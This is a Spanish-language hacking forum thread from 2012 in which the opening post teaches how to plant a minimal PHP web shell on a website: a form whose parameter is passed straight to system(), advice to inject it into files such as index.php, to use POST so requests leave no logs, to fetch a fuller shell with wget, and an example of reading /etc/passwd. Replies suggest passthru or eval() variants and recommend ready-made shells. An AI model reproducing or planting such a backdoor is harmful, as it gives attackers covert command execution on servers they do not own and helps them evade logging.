Creando un minibackdoor en PHP

Iniciado por Okol, Noviembre 24, 2012, 04:19:32 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Noviembre 24, 2012, 04:19:32 PM Ultima modificación: Noviembre 23, 2014, 02:50:56 PM por Expermicid
 Hola amigos, hoy explicaré como backdorizar una web. Es decir como crear un archivo que ejecute comandos, ya sea en linux o windows (Depende que servidor sea).
Esto es más seguro ya que solo deja 1 log y si lo haces con metodo POST no deja logs. El codigo seria así:
Código: php

<form method="GET" action="lol.php">
<input type="text" name="comando">
<input type="submit" value="ejecutar">
<?php
if(isset($_GET['comando']));
{
$lol = @system($_GET['comando']);


echo $lol;
}
?>

En el formulario ponemos que comando ejecutar, asi tenemos control sobre el servidor y podemos ejecutar cualquier comando, si te da la gana usas wget (LINUX) y subes una shell y la borras, un claro ejemplo de como funciona seria este:



Explicaré un poco la función por la que nuestro Mini Backdoor trabaja:
System: Es una función que permite ejecutar comandos dentro de un servidor.

En la foto lo que hicé fue ejecutar el comando cat /etc/passwd y como pueden ver se ejecuto satisfactoriamente.

Otra cosa que podemos hacer es poner
Código: php
$lol = @system($_GET['comando']);

en algún archivo ejemplo index.php y llamar a la variable lol por url y ejecutar el comando un ejemplo seria No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

y ejecutaria lo que es el comando.
Agradecimientos: Oggy & HD_Breaker
Espero que les haya gustado.
Un saludo.
Underc0de Manager!

Esta bien el script sencillo,pero util aunque yo usaria la función passthru enmes de system sobretodo para linux ademas lo suelta en bruto.
Saludos
No esperes nada, vive la vida, y que los demas hagan lo que ellos creen.

Bien hecho Okol! Linda shell! Yo usar POST, para q no quede guardado en los log al visitar la shell ;)

Entonces él dijo, "cruzad con vuestras tropas y atacad porque es lo único que le queda a nuestro pueblo...".

Buena esa man  8)
Sigueme en Twitter : @Sankosk
Estos nuevos staff no tienen puta idea XD

En vez de system, debieras reemplazarlo con eval(). Razón?? Simplemente porque system te permite ejecutar comando del sistema, en cambio eval te permite ejecutar un código PHP.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos.
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.

Esta bien, pero en lugar de reinventar la rueda, utilizaría una de las tantas que hay disponibles, por ejemplo la mejor que conozco es la que esta disponible en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

"Nunca discutas con un idiota, podria no notarse la diferencia"
Kant.

está genial la explicación, éste minituto para los que recién empezamos :D

CitarEsta bien, pero en lugar de reinventar la rueda, utilizaría una de las tantas que hay disponibles, por ejemplo la mejor que conozco es la que esta disponible en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

el tema no trata de cual es la mejor forma, o de inventé un minibackdoor, solo explica como crear uno pequeño, para los nuevos en el área.-

saludos!

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
está genial la explicación, éste minituto para los que recién empezamos :D

CitarEsta bien, pero en lugar de reinventar la rueda, utilizaría una de las tantas que hay disponibles, por ejemplo la mejor que conozco es la que esta disponible en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

el tema no trata de cual es la mejor forma, o de inventé un minibackdoor, solo explica como crear uno pequeño, para los nuevos en el área.-

saludos!
Muchas gracias por tu aclaración a ese usuario alex.
No estoy diciendo cual es la mejor forma, simplemente explique una.
Saludos.
Underc0de Manager!

El hecho de utilizar tus propias herramientas te hace resaltar del resto, no es reinventar la rueda, es independizarse, esto te convertira en mejor hacker y mejor programador, y ser menos lammer y vivir de herramientas que otros crearon.

Entonces él dijo, "cruzad con vuestras tropas y atacad porque es lo único que le queda a nuestro pueblo...".

Ok, no es mi intención restar importancia a este aporte, ni tampoco  desvalorizar el esfuerzo del usuario que ha creado este post (no soy quien para hacerlo) sin embargo, me pregunto, donde esta la backdoor? donde esta la vulnerabilidad que se ha explotado para crearla? es una RFI/LFI? es una vulnerabilidad del servidor o de una aplicación web concreta? lo que quiero decir, es que el aporte se resume en esto:

Código: php
@system('comando');


Y ojo, que no se trata de una critica ni estoy cuestionando a nadie, no es para que os pongáis a la defensiva  ;) solamente digo que tras leer el titulo del post, esperaba mucho más (como la explotación de una vulnerabilidad para crear una mini-backdoor), pero bueno, estoy seguro que a una persona que comienza a aprender a programar en PHP le será muy útil.

Saludos.  :)
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

"Nunca discutas con un idiota, podria no notarse la diferencia"
Kant.

Fin de ronda.
No más llevense bien , cierro tema.
Sigueme en Twitter : @Sankosk
Estos nuevos staff no tienen puta idea XD